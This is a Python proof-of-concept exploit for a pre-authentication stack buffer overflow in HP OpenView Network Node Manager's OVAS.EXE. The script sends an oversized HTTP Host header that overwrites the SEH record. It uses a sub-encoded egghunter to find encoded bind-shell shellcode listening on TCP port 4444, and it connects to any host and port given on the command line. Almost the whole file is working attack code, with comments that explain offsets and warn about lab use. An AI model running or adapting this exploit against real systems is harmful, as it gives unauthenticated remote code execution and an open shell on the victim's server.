#!/usr/bin/python
#
# POC for HP OpenView NNM B.07.50 OVAS.EXE Pre-Authentication Stack Buffer Overflow
# Based on HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Unauthenticated Overflow (SEH)
# https://www.exploit-db.com/exploits/5342/
#
# Payload = Bind shell on TCP port 4444 (the shell listens unauthenticated: anyone who can reach port 4444 on the target gets it, so use only on an isolated lab network)
# Tested on Windows Server 2003 SP1 only. The SEH handler address and the offsets below are specific to that build; against any other build expect OVAS.EXE to crash rather than spawn a shell.
#
# Usage: ovnnm.py <Host> <Port>
# Example: ovnnm.py 192.168.123.123 7510
#
import socket
import os
import sys
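bind = ""
bind += "\x89\xe5\xda\xd6\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49"
bind += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
bind += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
bind += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
bind += "\x58\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x4b\x58\x4f"
bind += "\x72\x75\x50\x73\x30\x63\x30\x51\x70\x4c\x49\x6a\x45"
bind += "\x30\x31\x79\x50\x33\x54\x4e\x6b\x76\x30\x44\x70\x6e"
bind += "\x6b\x73\x62\x66\x6c\x6c\x4b\x71\x42\x42\x34\x4e\x6b"
bind += "\x52\x52\x51\x38\x76\x6f\x6e\x57\x42\x6a\x65\x76\x45"
bind += "\x61\x39\x6f\x4e\x4c\x55\x6c\x75\x31\x53\x4c\x66\x62"
bind += "\x46\x4c\x77\x50\x39\x51\x38\x4f\x56\x6d\x36\x61\x49"
bind += "\x57\x5a\x42\x79\x62\x52\x72\x52\x77\x6e\x6b\x53\x62"
bind += "\x52\x30\x6c\x4b\x42\x6a\x65\x6c\x6c\x4b\x50\x4c\x32"
bind += "\x31\x43\x48\x68\x63\x33\x78\x65\x51\x68\x51\x63\x61"
bind += "\x6c\x4b\x31\x49\x31\x30\x33\x31\x39\x43\x4c\x4b\x33"
bind += "\x79\x47\x68\x49\x73\x54\x7a\x47\x39\x6e\x6b\x34\x74"
bind += "\x4e\x6b\x43\x31\x6b\x66\x50\x31\x49\x6f\x4c\x6c\x6f"
bind += "\x31\x58\x4f\x36\x6d\x46\x61\x4a\x67\x34\x78\x59\x70"
bind += "\x32\x55\x38\x76\x65\x53\x73\x4d\x48\x78\x65\x6b\x33"
bind += "\x4d\x71\x34\x44\x35\x78\x64\x72\x78\x4c\x4b\x32\x78"
bind += "\x55\x74\x63\x31\x78\x53\x33\x56\x4e\x6b\x44\x4c\x62"
bind += "\x6b\x4e\x6b\x56\x38\x75\x4c\x77\x71\x5a\x73\x4e\x6b"
bind += "\x74\x44\x6c\x4b\x56\x61\x4e\x30\x4d\x59\x53\x74\x45"
bind += "\x74\x45\x74\x33\x6b\x53\x6b\x70\x61\x62\x79\x70\x5a"
bind += "\x66\x31\x49\x6f\x39\x70\x43\x6f\x73\x6f\x70\x5a\x4e"
bind += "\x6b\x65\x42\x4a\x4b\x6e\x6d\x63\x6d\x45\x38\x44\x73"
bind += "\x44\x72\x73\x30\x77\x70\x73\x58\x30\x77\x31\x63\x44"
bind += "\x72\x33\x6f\x50\x54\x33\x58\x52\x6c\x50\x77\x55\x76"
bind += "\x34\x47\x69\x6f\x58\x55\x78\x38\x4e\x70\x53\x31\x63"
bind += "\x30\x67\x70\x76\x49\x39\x54\x42\x74\x46\x30\x65\x38"
bind += "\x67\x59\x6f\x70\x52\x4b\x65\x50\x79\x6f\x58\x55\x31"
bind += "\x7a\x63\x38\x62\x79\x70\x50\x6a\x42\x79\x6d\x47\x30"
bind += "\x56\x30\x61\x50\x66\x30\x63\x58\x7a\x4a\x36\x6f\x69"
bind += "\x4f\x69\x70\x4b\x4f\x59\x45\x6e\x77\x50\x68\x55\x52"
bind += "\x73\x30\x66\x71\x73\x6c\x6e\x69\x6a\x46\x30\x6a\x76"
bind += "\x70\x42\x76\x50\x57\x33\x58\x4b\x72\x6b\x6b\x45\x67"
bind += "\x53\x57\x49\x6f\x4b\x65\x53\x67\x72\x48\x38\x37\x38"
bind += "\x69\x70\x38\x39\x6f\x6b\x4f\x6a\x75\x61\x47\x61\x78"
bind += "\x53\x44\x48\x6c\x55\x6b\x6b\x51\x59\x6f\x7a\x75\x51"
bind += "\x47\x6d\x47\x75\x38\x64\x35\x32\x4e\x62\x6d\x63\x51"
bind += "\x79\x6f\x69\x45\x53\x58\x72\x43\x70\x6d\x33\x54\x65"
bind += "\x50\x4d\x59\x58\x63\x31\x47\x30\x57\x56\x37\x65\x61"
bind += "\x6b\x46\x50\x6a\x47\x62\x71\x49\x53\x66\x78\x62\x49"
bind += "\x6d\x63\x56\x49\x57\x37\x34\x54\x64\x77\x4c\x56\x61"
bind += "\x56\x61\x6c\x4d\x37\x34\x47\x54\x64\x50\x6a\x66\x77"
bind += "\x70\x53\x74\x42\x74\x52\x70\x43\x66\x61\x46\x43\x66"
bind += "\x51\x56\x53\x66\x62\x6e\x52\x76\x53\x66\x32\x73\x31"
bind += "\x46\x73\x58\x31\x69\x38\x4c\x75\x6f\x4e\x66\x59\x6f"
bind += "\x38\x55\x6b\x39\x39\x70\x52\x6e\x61\x46\x47\x36\x4b"
bind += "\x4f\x36\x50\x45\x38\x53\x38\x4f\x77\x75\x4d\x33\x50"
bind += "\x6b\x4f\x68\x55\x4f\x4b\x79\x70\x77\x6d\x64\x6a\x35"
bind += "\x5a\x71\x78\x4f\x56\x6a\x35\x6f\x4d\x4d\x4d\x49\x6f"
bind += "\x58\x55\x47\x4c\x33\x36\x73\x4c\x74\x4a\x4f\x70\x39"
bind += "\x6b\x6b\x50\x42\x55\x53\x35\x4d\x6b\x37\x37\x54\x53"
bind += "\x30\x72\x70\x6f\x51\x7a\x47\x70\x50\x53\x49\x6f\x78"
bind += "\x55\x41\x41"
# `bind` is an opaque, alphanumeric-looking encoded blob; only the header
# comment says it is a bind shell on TCP/4444. Nothing in this file verifies
# that -- disassemble it (or regenerate it yourself) before pointing this at
# anything, and remember a bind shell is reachable by whoever gets there first.

# Layout of the overflowing Host value. Every offset and address below is
# carried over from the exploit-db original and is only known to hold for the
# tested build (NNM B.07.50 OVAS.EXE on Windows Server 2003 SP1). On any other
# build the handler address is simply wrong and the request crashes OVAS.EXE.
SEH_OFFSET = 3379                            # filler bytes before the SEH record is overwritten
SEH_OVERWRITE = "\x75\x04\x4c\x3b\x37\x6d"   # "\x75\x04" (jne +4) then handler address 0x6d373b4c, little-endian
SLED = "B" * 10                              # 0x42 = inc edx; harmless landing pad after the short jump
HOST_FIELD_LEN = 4000                        # total length of the Host value the original sends
EGG = "W00TW00T"                             # tag the egghunter scans memory for; the payload follows it
# NOTE(review): the jne presumably sits in the next-SEH slot and hops over the
# 4-byte handler address into SLED once the handler's pop/pop/ret fires --
# confirm in a debugger before changing any offset.

# Decodes as: push esp / pop eax ; three "sub eax, imm32" ; push eax / pop esp.
# Rebases ESP so the PUSHes emitted by the decoder below land at a known place.
stack_align = "\x54\x58\x2D\x04\x4B\x54\x55\x2D\x04\x4B\x54\x55\x2D\x04\x4C\x56\x55\x50\x5C"
# Looks like the classic AND/AND/SUB/SUB/SUB/PUSH sub-encoding: each 26-byte
# group zeroes EAX, computes one dword and pushes it, building the decoded
# egghunter on the stack backwards (8 groups -> 32 bytes of hunter).
egghunt_built = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x09\x08\x55\x08\x2D\x09\x08\x55\x08\x2D\x79\x08\x56\x07\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x09\x07\x6F\x2D\x70\x09\x07\x6F\x2D\x71\x77\x07\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x39\x7B\x01\x2D\x45\x39\x7B\x01\x2D\x46\x39\x7E\x02\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x05\x6C\x38\x45\x2D\x05\x6C\x38\x45\x2D\x07\x6F\x37\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x41\x53\x37\x09\x2D\x41\x53\x37\x09\x2D\x42\x54\x37\x79\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x37\x65\x45\x2D\x54\x37\x65\x45\x2D\x56\x39\x68\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x3E\x39\x31\x2D\x50\x3E\x39\x31\x2D\x51\x41\x3B\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x33\x09\x66\x55\x2D\x33\x09\x66\x55\x2D\x34\x6C\x69\x55\x50"


def build_crash():
    """Return the HOST_FIELD_LEN-byte Host value that overwrites the SEH record.

    Layout: SEH_OFFSET filler bytes, SEH_OVERWRITE, SLED, stack_align,
    egghunt_built, then "C" padding up to HOST_FIELD_LEN.

    Raises ValueError if the fixed parts already exceed HOST_FIELD_LEN; the
    original silently emitted a shorter value in that case ("C" * negative is
    ""), which changes the overflow without any warning.
    """
    head = "A" * SEH_OFFSET + SEH_OVERWRITE + SLED + stack_align + egghunt_built
    pad = HOST_FIELD_LEN - len(head)
    if pad < 0:
        raise ValueError(
            "overflow string is %d bytes over the %d-byte Host field" % (-pad, HOST_FIELD_LEN)
        )
    return head + "C" * pad


def build_request(host_value=None):
    """Return the complete HTTP request as a text string (one char per byte).

    host_value defaults to build_crash(). The overflow travels in the Host
    header; the body carries EGG followed by the bind shellcode, which the
    egghunter locates in memory. The oversized Content-Length is copied from
    the original -- presumably it keeps the server holding the body while the
    hunter runs, but that is not verified here.
    """
    if host_value is None:
        host_value = build_crash()
    lines = [
        "GET /topology/homeBaseView HTTP/1.1",
        "Host: " + host_value,
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: TIPTIPTIP",
        "Content-Length: 1048580",
        "",
        "",
    ]
    return "\r\n".join(lines) + EGG + bind


def _to_wire(text):
    """Return text as bytes, one byte per character.

    The literals above spell raw bytes as \\xNN escapes. Under Python 2 they
    are already byte strings; under Python 3 latin-1 maps every code point
    back to the intended byte value unchanged.
    """
    if isinstance(text, bytes):
        return text
    return text.encode("latin-1")


# Kept as module-level names for anyone who read them off the old flat script.
crash = build_crash()
buffer = build_request(crash)


def main(argv=None):
    """Send the request to <Host> <Port> (from argv or sys.argv[1:]).

    Returns the process exit status: 2 on a usage error, 0 once the request
    has been handed to the kernel. Note that nothing is read back -- success
    here does not mean the shell came up.
    """
    args = sys.argv[1:] if argv is None else argv
    if len(args) != 2:
        sys.stderr.write("Usage: ovnnm.py <Host> <Port>\n")
        return 2
    host = args[0]
    port = int(args[1])
    print(buffer)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)  # a filtered port would otherwise hang connect() forever
    try:
        sock.connect((host, port))
        # send() may write only part of the request; a truncated overflow is
        # just a crash, so insist on the whole thing going out.
        sock.sendall(_to_wire(buffer))
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main())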